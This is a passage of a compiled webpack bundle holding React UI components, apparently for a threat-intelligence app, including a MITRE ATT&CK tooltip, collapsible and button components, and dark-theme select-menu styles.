var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

function _objectWithoutProperties(obj, keys) { var target = {}; for (var i in obj) { if (keys.indexOf(i) >= 0) continue; if (!Object.prototype.hasOwnProperty.call(obj, i)) continue; target[i] = obj[i]; } return target; }

// $FlowFixMe: useEffect requires flow-bin 0.82.




var debug = __WEBPACK_IMPORTED_MODULE_3_debug___default()('app:components:MitreTagTooltipAndMetadata'); // eslint-disable-line no-unused-vars






// Style for Main Components (things you may export)
var StyledMitreMetadataBox = __WEBPACK_IMPORTED_MODULE_2_styled_components__["c" /* default */].div.withConfig({
  displayName: 'MitreTagTooltipAndMetadata__StyledMitreMetadataBox',
  componentId: 'zaasth-0'
})(['width:25rem;max-height:12rem;overflow-x:hidden;border-radius:0.5rem;padding:0.75rem;overflow-y:scroll;word-break:break-word;hyphens:auto;border:1px solid ', ';h6{font-size:1.3rem;padding:0 0 0.25rem 0;margin:0;text-transform:capitalize;}a{display:block;}span{text-transform:capitalize;margin-bottom:0.1rem;&:first-of-type{display:block;}}', ''], function (_ref) {
  var theme = _ref.theme;
  return theme.ThemeColors.DARK.hex;
}, __WEBPACK_IMPORTED_MODULE_8_trustar_2_0_themes_common_globalSnippets_styles__["b" /* thinScrollBar */]);

var initialValues = {};

// Bindings


var MitreInfoTagTooltip = function MitreInfoTagTooltip(_ref2) {
  var mitreTagInfo = _ref2.mitreTagInfo,
      children = _ref2.children,
      otherProps = _objectWithoutProperties(_ref2, ['mitreTagInfo', 'children']);

  // TODO Fallback?
  var metadata = mitreTagInfo.get('metadata');
  var subtype = mitreTagInfo.get('subtype');
  var isTechnique = subtype === 'technique';
  var isTactic = subtype === 'tactic';
  var humanizedTacticList = metadata.get('tactics', Object(__WEBPACK_IMPORTED_MODULE_5_immutable__["List"])()).map(function (tacticName, index, humanizedTacticList) {
    return tacticName === humanizedTacticList.last() ? Object(__WEBPACK_IMPORTED_MODULE_7_trustar_utils__["capitalize"])(tacticName) : Object(__WEBPACK_IMPORTED_MODULE_7_trustar_utils__["capitalize"])(tacticName) + ', ';
  });

  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    __WEBPACK_IMPORTED_MODULE_6__shared_styles__["a" /* StyledTooltip */],
    _extends({ noPadding: true }, otherProps),
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
      StyledMitreMetadataBox,
      null,
      __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'h6',
        null,
        ' ',
        isTactic ? metadata.get('key') : metadata.get('technique')
      ),
      __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'span',
        null,
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'b',
          null,
          'Type:'
        ),
        ' ',
        subtype
      ),
      isTechnique && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'span',
        { className: 'tactics-list' },
        ' ',
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'b',
          null,
          'Tactics:'
        ),
        ' ',
        humanizedTacticList
      ),
      __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'a',
        { target: '_blank', href: metadata.get('externalUrl') },
        'See Full MITRE ATT&CK Entry'
      ),
      __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'p',
        null,
        ' ',
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'b',
          null,
          ' Description: '
        ),
        ' ',
        metadata.get('description')
      )
    )
  );
};



/***/ }),
/* 3555 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return StyledTooltip; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_styled_components__ = __webpack_require__(11);


var StyledTooltip = __WEBPACK_IMPORTED_MODULE_0_styled_components__["c" /* default */].span.withConfig({
  displayName: "sharedstyles__StyledTooltip",
  componentId: "sc-1w4ke2r-0"
})(["display:inline-block;background-color:", ";color:", ";border:1px solid ", ";padding:", ";"], function (_ref) {
  var theme = _ref.theme;
  return theme.ThemeColors.SURFACE.hex;
}, function (_ref2) {
  var theme = _ref2.theme;
  return theme.ThemeColors.TEXT.hex;
}, function (_ref3) {
  var theme = _ref3.theme;
  return theme.ThemeColors.BORDER.hex;
}, function (_ref4) {
  var noPadding = _ref4.noPadding;
  return noPadding ? 0 : '0.5rem';
});

/***/ }),
/* 3556 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = __webpack_require__.p + "8fa6f8f7363b6f62a689726f54f0cca1.woff2";

/***/ }),
/* 3557 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = __webpack_require__.p + "2cc70832a9625a46c5af736a46b21bb7.woff2";

/***/ }),
/* 3558 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = __webpack_require__.p + "7b9158b6cf0ffd9460176eeb74f75054.woff2";

/***/ }),
/* 3559 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = __webpack_require__.p + "86434669de029752d613b1b84ad69e76.woff2";

/***/ }),
/* 3560 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Elevation; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_redux__ = __webpack_require__(24);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_2_0_types__ = __webpack_require__(97);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _objectWithoutProperties(obj, keys) { var target = {}; for (var i in obj) { if (keys.indexOf(i) >= 0) continue; if (!Object.prototype.hasOwnProperty.call(obj, i)) continue; target[i] = obj[i]; } return target; }

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }





var debug = __WEBPACK_IMPORTED_MODULE_3_debug___default()('app:components:Elevation'); // eslint-disable-line no-unused-vars


var getDropShadowLevel = function getDropShadowLevel(level) {
  var rightShadow = level * 2 + 'px';
  var bottomShadow = level * 4 + 'px';

  return 'box-shadow: 0px ' + rightShadow + ' ' + bottomShadow + ' 0px rgba(0,0,0.5);';
};

// Style for Main Components (things you may export)
var StyledElevation = __WEBPACK_IMPORTED_MODULE_2_styled_components__["c" /* default */].div.withConfig({
  displayName: 'Elevation__StyledElevation',
  componentId: 'ic3367-0'
})(['', ' display:inline-block;'], function (_ref) {
  var level = _ref.level;
  return getDropShadowLevel(level);
});

var initialValues = {
  level: 0
};

// Bindings

var Elevation = function (_Component) {
  _inherits(Elevation, _Component);

  function Elevation() {
    _classCallCheck(this, Elevation);

    return _possibleConstructorReturn(this, (Elevation.__proto__ || Object.getPrototypeOf(Elevation)).apply(this, arguments));
  }

  _createClass(Elevation, [{
    key: 'render',


    //  ----Template----

    value: function render() {
      var otherProps = _objectWithoutProperties(this.props, []);

      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        StyledElevation,
        otherProps,
        this.props.children
      );
    }

    // ----Methods----

  }]);

  return Elevation;
}(__WEBPACK_IMPORTED_MODULE_0_react__["Component"]);

// Logic & Helper Components

Elevation.defaultProps = initialValues;


/***/ }),
/* 3561 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export Collapsable */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_redux__ = __webpack_require__(24);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_2_0_types__ = __webpack_require__(97);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_reactstrap__ = __webpack_require__(59);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__themes__ = __webpack_require__(77);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

var _slicedToArray = function () { function sliceIterator(arr, i) { var _arr = []; var _n = true; var _d = false; var _e = undefined; try { for (var _i = arr[Symbol.iterator](), _s; !(_n = (_s = _i.next()).done); _n = true) { _arr.push(_s.value); if (i && _arr.length === i) break; } } catch (err) { _d = true; _e = err; } finally { try { if (!_n && _i["return"]) _i["return"](); } finally { if (_d) throw _e; } } return _arr; } return function (arr, i) { if (Array.isArray(arr)) { return arr; } else if (Symbol.iterator in Object(arr)) { return sliceIterator(arr, i); } else { throw new TypeError("Invalid attempt to destructure non-iterable instance"); } }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }





var debug = __WEBPACK_IMPORTED_MODULE_3_debug___default()('app:components:Collapsable'); // eslint-disable-line no-unused-vars




// TODO PUT IN CONSTANTS
var heightValueCalculator = function heightValueCalculator() {
  var heightValue = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : '';
  var multiplier = arguments[1];

  // Am I proud or ashamed of this
  var _ref = heightValue.includes('rem') ? heightValue.split('rem').filter(Boolean).concat('rem') : heightValue.split('px').filter(Boolean).concat('px'),
      _ref2 = _slicedToArray(_ref, 2),
      value = _ref2[0],
      units = _ref2[1];

  return '' + multiplier * Number(value) + units;
};

// Style for Main Components (things you may export)
var StyledCollapsable = __WEBPACK_IMPORTED_MODULE_2_styled_components__["c" /* default */].div.withConfig({
  displayName: 'Collapsable__StyledCollapsable',
  componentId: 'sc-1gtprdn-0'
})(['display:inline-block;height:', ';'], function (_ref3) {
  var theme = _ref3.theme,
      numberOfLinesToShow = _ref3.numberOfLinesToShow,
      isOpen = _ref3.isOpen;
  return heightValueCalculator(theme.FontSizes.P, numberOfLinesToShow);
});

var initialValues = {
  isOpen: false,
  numberOfLinesToShow: 5,
  theme: __WEBPACK_IMPORTED_MODULE_6__themes__["b" /* DefaultTheme */]
};

// Bindings

var Collapsable = function (_Component) {
  _inherits(Collapsable, _Component);

  function Collapsable() {
    var _ref4;

    var _temp, _this, _ret;

    _classCallCheck(this, Collapsable);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref4 = Collapsable.__proto__ || Object.getPrototypeOf(Collapsable)).call.apply(_ref4, [this].concat(args))), _this), _this.state = {
      isOpen: _this.props.isOpen || initialValues.isOpen
    }, _this.toggle = function (option) {
      _this.setState({ isOpen: !_this.state.isOpen });
      if (_this.props.doOnToggle) _this.props.doOnToggle();
    }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  _createClass(Collapsable, [{
    key: 'render',

    //  ----Template----

    value: function render() {
      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        StyledCollapsable,
        this.props,
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          __WEBPACK_IMPORTED_MODULE_5_reactstrap__["Collapse"],
          { isOpen: this.state.isOpen },
          this.props.children
        )
      );
    }

    // ----Lifecycle Hooks----

    // ----Methods----

  }]);

  return Collapsable;
}(__WEBPACK_IMPORTED_MODULE_0_react__["Component"]);

// Logic & Helper Components


Collapsable.defaultProps = initialValues;
var options = [];

// Connect To State -- Only if this component MUST be connected at declaration. RARE.
var mapStateToProps = function mapStateToProps(state) {
  return {
    isOpen: null // Some variable,
  };
};

var dispatchProps = {
  methodOne: function methodOne() {} // Some action
};

// export -- Only if this component MUST be connected at declaration. RARE.
// export default connect(mapStateToProps, dispatchProps)(Collapsable);



/***/ }),
/* 3562 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__BaseButton__ = __webpack_require__(526);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_2_0_themes__ = __webpack_require__(77);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_2_0_components__ = __webpack_require__(42);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__themes_common__ = __webpack_require__(212);
function _objectWithoutProperties(obj, keys) { var target = {}; for (var i in obj) { if (keys.indexOf(i) >= 0) continue; if (!Object.prototype.hasOwnProperty.call(obj, i)) continue; target[i] = obj[i]; } return target; }









var StyledSpinnerButton = Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */])(__WEBPACK_IMPORTED_MODULE_2__BaseButton__["a" /* default */]).withConfig({
  displayName: 'SpinnerButton__StyledSpinnerButton',
  componentId: 'sc-1ridnie-0'
})(['&&{display:inline-flex;}.sk-spinner{color:', ';}'], function (props) {
  return getSpinnerColor(props);
});

var getSpinnerColor = function getSpinnerColor(_ref) {
  var buttonType = _ref.buttonType,
      theme = _ref.theme,
      fill = _ref.fill;

  var themedColorObject = Object(__WEBPACK_IMPORTED_MODULE_5__themes_common__["getButtonColorWithTheme"])(buttonType, theme);
  return fill === 'outline' ? themedColorObject.hex : fill === 'none' ? theme.ThemeColors.LIGHT.buttonColor : themedColorObject.buttonText;
};

var SpinnerButton = function SpinnerButton(_ref2) {
  var color = _ref2.color,
      hideTextOnLoad = _ref2.hideTextOnLoad,
      isLoading = _ref2.isLoading,
      props = _objectWithoutProperties(_ref2, ['color', 'hideTextOnLoad', 'isLoading']);

  var showText = !isLoading || !hideTextOnLoad;

  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    StyledSpinnerButton,
    props,
    showText && props.children,
    isLoading && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_4_trustar_2_0_components__["z" /* Spinner */], { inline: true, bsSize: 'sm' })
  );
};

/* harmony default export */ __webpack_exports__["a"] = (SpinnerButton);

/***/ }),
/* 3563 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return CheckmarkButton; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_trustar_2_0_components__ = __webpack_require__(42);




var StyledCheckmarkButton = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].button.withConfig({
  displayName: 'CheckmarkButton__StyledCheckmarkButton',
  componentId: 'sc-1l05b4m-0'
})(['display:inline-flex;justify-content:center;align-items:center;padding:.05rem;border-radius:0;border:1px solid #CCCCCC;width:1rem;height:1rem;i{font-size:.8rem;font-weight:bold;}', ''], function (props) {
  return props.size && Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["b" /* css */])(['width:', ';height:', ';'], props.size, props.size);
});

var CheckmarkButton = function CheckmarkButton(props) {
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    StyledCheckmarkButton,
    { size: props.size },
    props.isChecked && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_2_trustar_2_0_components__["o" /* Icon */], { icon: __WEBPACK_IMPORTED_MODULE_2_trustar_2_0_components__["s" /* IconLookup */].CHECK })
  );
};

/***/ }),
/* 3564 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Select; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames__ = __webpack_require__(85);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_classnames__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_react_select__ = __webpack_require__(805);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_react_select___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_react_select__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_react_select_dist_react_select_css__ = __webpack_require__(1486);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_react_select_dist_react_select_css___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_react_select_dist_react_select_css__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__Select_styl__ = __webpack_require__(3575);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__Select_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4__Select_styl__);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _objectWithoutProperties(obj, keys) { var target = {}; for (var i in obj) { if (keys.indexOf(i) >= 0) continue; if (!Object.prototype.hasOwnProperty.call(obj, i)) continue; target[i] = obj[i]; } return target; }

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }








/**
 * This was created to add valueLink functionality and any other custom logic we
 * need.
 *
 * NOTE: This used to use the pure render mixin.
 */

var Select = function (_React$Component) {
  _inherits(Select, _React$Component);

  function Select() {
    _classCallCheck(this, Select);

    return _possibleConstructorReturn(this, (Select.__proto__ || Object.getPrototypeOf(Select)).apply(this, arguments));
  }

  _createClass(Select, [{
    key: 'componentDidMount',
    value: function componentDidMount() {
      if (this.props.onMount) {
        this.props.onMount();
      }
    }
  }, {
    key: 'render',
    value: function render() {
      var _props = this.props,
          className = _props.className,
          valueLink = _props.valueLink,
          onChange = _props.onChange,
          value = _props.value,
          meta = _props.meta,
          props = _objectWithoutProperties(_props, ['className', 'valueLink', 'onChange', 'value', 'meta']); // eslint-disable-line prefer-const


      value = valueLink ? valueLink.value : value;
      onChange = valueLink ? valueLink.requestChange : onChange;
      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'div',
        { 'data-cy': 'react-select-containing-div' },
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_2_react_select___default.a, _extends({
          className: __WEBPACK_IMPORTED_MODULE_1_classnames___default()(__WEBPACK_IMPORTED_MODULE_4__Select_styl___default.a.Select, className),
          value: value,
          onChange: onChange
        }, props)),
        meta && meta.touched && meta.error && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'span',
          { className: __WEBPACK_IMPORTED_MODULE_1_classnames___default()(__WEBPACK_IMPORTED_MODULE_4__Select_styl___default.a.error, 'error') },
          meta.error
        )
      );
    }
  }]);

  return Select;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

/***/ }),
/* 3565 */,
/* 3566 */,
/* 3567 */,
/* 3568 */,
/* 3569 */,
/* 3570 */,
/* 3571 */,
/* 3572 */,
/* 3573 */,
/* 3574 */,
/* 3575 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3576);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./Select.styl", function() {
			var newContent = require("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./Select.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3576 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
exports.push([module.i, "/* **************************************************************************\n * Select Menu, dark theme\n * *************************************************************************/\n.light .Select,\n.light .Select-placeholder,\n.light .Select-control {\n  color: #4a4a4a;\n}\n.light .Select-placeholder {\n  color: #aaa;\n}\n.light .Select-option.is-disabled {\n  color: #aaa;\n  text-decoration: line-through;\n}\n.dark .Select,\n.dark .Select-placeholder,\n.dark .Select-control {\n  background: #1a1c20;\n  color: #fff;\n  border: none;\n}\n.dark .Select .Select-value,\n.dark .Select-placeholder .Select-value,\n.dark .Select-control .Select-value {\n  color: #fff;\n}\n.dark .Select .Select-value-icon,\n.dark .Select-placeholder .Select-value-icon,\n.dark .Select-control .Select-value-icon {\n  color: #fff;\n}\n.dark .Select-placeholder {\n  color: #aaa;\n}\n.dark .Select {\n  border: 1px solid #464646;\n}\n.dark .Select-input input {\n  border: none;\n  background: transparent;\n}\n.dark .Select.is-open,\n.dark .Select.is-focused {\n  background: #464646;\n}\n.dark .Select-item {\n  background: #1a1c20;\n  color: #fff;\n}\n.dark .Select-noresults {\n  background: #1a1c20;\n  color: #fff;\n}\n.dark .Select-option {\n  background: #1a1c20;\n  color: #fff;\n}\n.dark .Select-option.is-focused {\n  background: #464646;\n  color: #fff;\n}\n.dark .Select-menu-outer {\n  border-color: #626262;\n}\n.dark .Select-item-icon {\n  background: #464646;\n  color: #fff;\n}\n.dark .Select-item-icon:hover {\n  background: #d13f19;\n  color: #d13f19;\n}\n.dark .Select-option.is-disabled {\n  color: #aaa;\n  text-decoration: line-through;\n}\n.dark .Select-option.is-disabled:hover {\n  background: #1d3a59;\n}\n.dark .Select__Select-value__1VYE0G {\n  color: #fff;\n}\n.dark .has-value.Select--single > .Select-control .Select-value .Select-value-label {\n  color: #fff;\n}\n.dark .Select.is-disabled > .Select-control {\n  background: #1a1c20;\n  color: #fff;\n}\n/* **************************************************************************\n * Select With Icon\n * *************************************************************************/\n.SelectWithIcon {\n  z-index: 2;\n  display: flex;\n  align-items: center;\n  border-radius: 3px;\n  border: 1px solid #ced2d6;\n  margin-right: 20px;\n  background: linear-gradient(to bottom, #fcfcfc, #eee);\n}\n.SelectWithIcon i {\n  color: #8c8c8c;\n  width: 38px;\n  padding: 0 10px;\n}\n.SelectWithIcon .Select__Select__140svy {\n  width: 100%;\n}\n.SelectWithIcon .Select__Select__140svy .Select-control {\n  border-radius: 0 3px 3px 0;\n  color: #4a4a4a;\n  border: 1px solid transparent;\n  border-left-color: #ced2d6;\n}\n.SelectWithIcon .Select__Select__140svy .is-open {\n  border-color: #245da7;\n}\n.dark .SelectWithIcon {\n  background: linear-gradient(to top, #183049, #0d1926);\n  border: 1px solid #464646;\n}\n.dark .SelectWithIcon .Select__Select__140svy {\n  border: none;\n}\n.dark .SelectWithIcon .Select__Select__140svy .Select-control {\n  color: #fff;\n  border-left-color: #464646;\n}\n", ""]);

// exports
exports.locals = {
	"Select-value": "Select__Select-value__1VYE0G",
	"Select": "Select__Select__140svy"
};

/***/ }),
/* 3577 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return TagSelect; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_select__ = __webpack_require__(805);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_select___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_react_select__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_classnames_bind__ = __webpack_require__(39);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_classnames_bind___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_classnames_bind__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_react_select_dist_react_select_css__ = __webpack_require__(1486);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_react_select_dist_react_select_css___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_react_select_dist_react_select_css__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__TagSelect_styl__ = __webpack_require__(3578);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__TagSelect_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5__TagSelect_styl__);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _objectWithoutProperties(obj, keys) { var target = {}; for (var i in obj) { if (keys.indexOf(i) >= 0) continue; if (!Object.prototype.hasOwnProperty.call(obj, i)) continue; target[i] = obj[i]; } return target; }

